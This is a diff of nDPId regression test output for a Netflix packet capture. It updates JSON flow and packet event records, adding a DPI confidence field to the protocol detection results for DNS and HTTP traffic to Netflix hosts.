-00757{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":609,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319042988,"flow_last_seen":1484319043002,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":74,"midstream":0,"ts_msec":1484319043002,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"artwork.akam.nflximg.net","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.204.25"}}
+00783{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":609,"source":"netflix.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319042988,"flow_last_seen":1484319043002,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":106,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":74,"midstream":0,"ts_msec":1484319043002,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":59180,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"artwork.akam.nflximg.net","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"184.25.204.25"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":610,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319043012,"flow_last_seen":1484319043012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319043012,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":610,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1484319043012,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319043012,"pkt":"gCqoTGHM5JjWH70UCABFAABA10xAAEAGHYnAqAEHuBnMGc+cAFC2IFmCAAAAALAC\/\/8TjwAAAgQFtAEDAwUBAQgKH2TelwAAAAAEAgAA"}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319043013,"flow_last_seen":1484319043013,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319043013,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -119,67 +119,68 @@
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1484319043035,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319043035,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Lm4GcwZwKgBBwBQz53Qk2dE1OOFkqAScSD1lgAAAgQFtAQCCAr\/\/DsiH2TemAEDAwU="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1484319043041,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319043041,"pkt":"gCqoTGHM5JjWH70UCABFAAA0zhNAAEAGJs7AqAEHuBnMGc+cAFC2IFmDcAwqOIAQEBVtuwAAAQEICh9k3rb\/\/Dsd"}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":622,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1484319043042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319043042,"pkt":"gCqoTGHM5JjWH70UCABFAAA0UPZAAEAGo+vAqAEHuBnMGc+dAFDU44WS0JNnRYAQEBWFTgAAAQEICh9k3rb\/\/Dsi"}
-00813{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043012,"flow_last_seen":1484319043068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1484319043068,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/af7a5\/362643424e775d0393ddb46e145c2375367af7a5.webp","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}}
-00812{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":627,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043013,"flow_last_seen":1484319043078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1484319043078,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/5758c\/bb636e44b87ef854c331ed7b7b6e157e4945758c.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}}
+00839{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":626,"source":"netflix.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043012,"flow_last_seen":1484319043068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1484319043068,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53148,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/af7a5\/362643424e775d0393ddb46e145c2375367af7a5.webp","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}}
+00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":627,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043013,"flow_last_seen":1484319043078,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1484319043078,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/5758c\/bb636e44b87ef854c331ed7b7b6e157e4945758c.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319043665,"flow_last_seen":1484319043665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319043665,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1484319043665,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319043665,"pkt":"gCqoTGHM5JjWH70UCABFAABAaV9AAEAGi3bAqAEHuBnMGc+eAFByPGEHAAAAALAC\/\/9NegAAAgQFtAEDAwUBAQgKH2ThCQAAAAAEAgAA"}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1484319043688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319043688,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAADwG+Lm4GcwZwKgBBwBQz57u7DQucjxhCKAScSCMigAAAgQFtAQCCAr\/\/D2rH2ThCQEDAwU="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1484319043689,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319043689,"pkt":"gCqoTGHM5JjWH70UCABFAAA0VAZAAEAGoNvAqAEHuBnMGc+eAFByPGEI7uw0L4AQEBUcSAAAAQEICh9k4SH\/\/D2r"}
-00812{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043665,"flow_last_seen":1484319043691,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1484319043691,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/87b33\/bed1223a0040fdc97bac4e906332e462c6e87b33.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}}
+00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":671,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319043665,"flow_last_seen":1484319043691,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1484319043691,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"art-2.nflximg.net","url":"art-2.nflximg.net\/87b33\/bed1223a0040fdc97bac4e906332e462c6e87b33.jpg","code":0,"content_type":"","user_agent":"Argo\/9.1.0 (iPhone; iOS 10.2; Scale\/2.00)"}}
 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":703,"source":"netflix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1484319044993,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"ts_msec":1484319044993,"pkt":"gCqoTGHM5JjWH70UCABFAAAoz5tAAEAGHmfAqAEHNBhXBs7BAbvkIOdlTYzTZlAUEACWDAAAAAAAAAAA"}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":795,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319048757,"flow_last_seen":1484319048757,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1484319048757,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":795,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1484319048757,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"ts_msec":1484319048757,"pkt":"gCqoTGHM5JjWH70UCABFAABBS2MAAP8R7O\/AqAEHwKgBAeL2ADUALZ5c\/mQBAAABAAAAAAAAB2FwcGJvb3QHbmV0ZmxpeANjb20AAAEAAQ=="}
-00736{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319048757,"flow_last_seen":1484319048757,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1484319048757,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"appboot.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":795,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319048757,"flow_last_seen":1484319048757,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1484319048757,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"appboot.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1484319048776,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":192,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":192,"pkt_l4_len":158,"ts_msec":1484319048776,"pkt":"5JjWH70UgCqoTGHMCABFAACy4UZAAEAR1ZvAqAEBwKgBBwA14vYAnkKZ\/mSBgAABAAUAAAAAB2FwcGJvb3QHbmV0ZmxpeANjb20AAAEAAcAMAAUAAQAAAG0ADgdhcHBib290A2dlb8AUwDEABQABAAABawAbB2FwcGJvb3QJdXMtd2VzdC0yBnByb2RhYcAUwEsAAQABAAAACwAENsm\/hMBLAAEAAQAAAAsABDQr9VrASwABAAEAAAALAAQ0GfQx"}
-00753{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":796,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319048757,"flow_last_seen":1484319048776,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1484319048776,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"appboot.netflix.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.201.191.132"}}
+00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":796,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319048757,"flow_last_seen":1484319048776,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":93,"midstream":0,"ts_msec":1484319048776,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"appboot.netflix.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.201.191.132"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":797,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319048780,"flow_last_seen":1484319048780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319048780,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":797,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1484319048780,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319048780,"pkt":"gCqoTGHM5JjWH70UCABFAABAtrNAAEAGzAfAqAEHNsm\/hM+fAFA6e8d6AAAAALAC\/\/+ZMQAAAgQFtAEDAwUBAQgKH2T0hAAAAAAEAgAA"}
 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":798,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1484319048824,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319048824,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGmJ82yb+EwKgBBwBQz59tgW\/FOnvHe6ASRep1DwAAAgQFtAQCCApXXrqDH2T0hAEDAwg="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":799,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1484319048826,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319048826,"pkt":"gCqoTGHM5JjWH70UCABFAAA0VQxAAEAGLbvAqAEHNsm\/hM+fAFA6e8d7bYFvxoAQEBXZhAAAAQEICh9k9LFXXrqD"}
-00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":800,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319048780,"flow_last_seen":1484319048830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":78,"midstream":0,"ts_msec":1484319048830,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"appboot.netflix.com","url":"appboot.netflix.com\/appboot\/NFAPPL-02-","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}}
+00812{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":800,"source":"netflix.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319048780,"flow_last_seen":1484319048830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":313,"flow_tot_l4_payload_len":313,"flow_avg_l4_payload_len":78,"midstream":0,"ts_msec":1484319048830,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"54.201.191.132","src_port":53151,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"appboot.netflix.com","url":"appboot.netflix.com\/appboot\/NFAPPL-02-","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}}
 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":861,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049465,"flow_last_seen":1484319049465,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1484319049465,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":861,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1484319049465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1484319049465,"pkt":"gCqoTGHM5JjWH70UCABFAABAjtZAAEAGjk7AqAEHNFkni8+gAFCVL\/AiAAAAALAC\/\/+toQAAAgQFtAEDAwUBAQgKH2T3IAAAAAAEAgAA"}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":863,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1484319049510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1484319049510,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACoGMwk0WSeLwKgBBwBQz6CC\/YxQlS\/wI6ASRerkyQAAAgQFtAQCCAqtiNcHH2T3IAEDAwg="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":864,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1484319049516,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1484319049516,"pkt":"gCqoTGHM5JjWH70UCABFAAA0TN5AAEAG0FLAqAEHNFkni8+gAFCVL\/Ajgv2MUYAQEBVJOgAAAQEICh9k91KtiNcH"}
-00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":865,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049465,"flow_last_seen":1484319049518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":649,"flow_tot_l4_payload_len":649,"flow_avg_l4_payload_len":162,"midstream":0,"ts_msec":1484319049518,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"api-global.netflix.com","url":"api-global.netflix.com\/msl\/nrdjs\/2.1.2","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}}
+00815{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":865,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319049465,"flow_last_seen":1484319049518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":649,"flow_tot_l4_payload_len":649,"flow_avg_l4_payload_len":162,"midstream":0,"ts_msec":1484319049518,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"api-global.netflix.com","url":"api-global.netflix.com\/msl\/nrdjs\/2.1.2","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}}
+00825{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":878,"source":"netflix.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1484319049465,"flow_last_seen":1484319049580,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":4993,"flow_avg_l4_payload_len":624,"midstream":0,"ts_msec":1484319049580,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"},"http": {"hostname":"api-global.netflix.com","url":"api-global.netflix.com\/msl\/nrdjs\/2.1.2","code":0,"content_type":"","user_agent":"Argo\/900 CFNetwork\/808.2.16 Darwin\/16.3.0"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":886,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319049641,"flow_last_seen":1484319049641,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1484319049641,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1484319049641,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"ts_msec":1484319049641,"pkt":"gCqoTGHM5JjWH70UCABFAABCJHQAAP8RE97AqAEHwKgBAcoQADUALkrZBBoBAAABAAAAAAAABGE4MDMEZHNjZwZha2FtYWkDbmV0AAABAAE="}
